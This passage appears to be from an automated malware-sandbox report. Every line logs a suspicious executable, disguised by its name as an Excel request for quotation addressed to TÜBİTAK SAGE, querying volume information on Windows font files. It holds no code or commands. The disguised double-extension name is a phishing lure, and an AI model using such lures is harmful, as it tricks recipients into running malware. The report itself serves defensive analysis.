                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
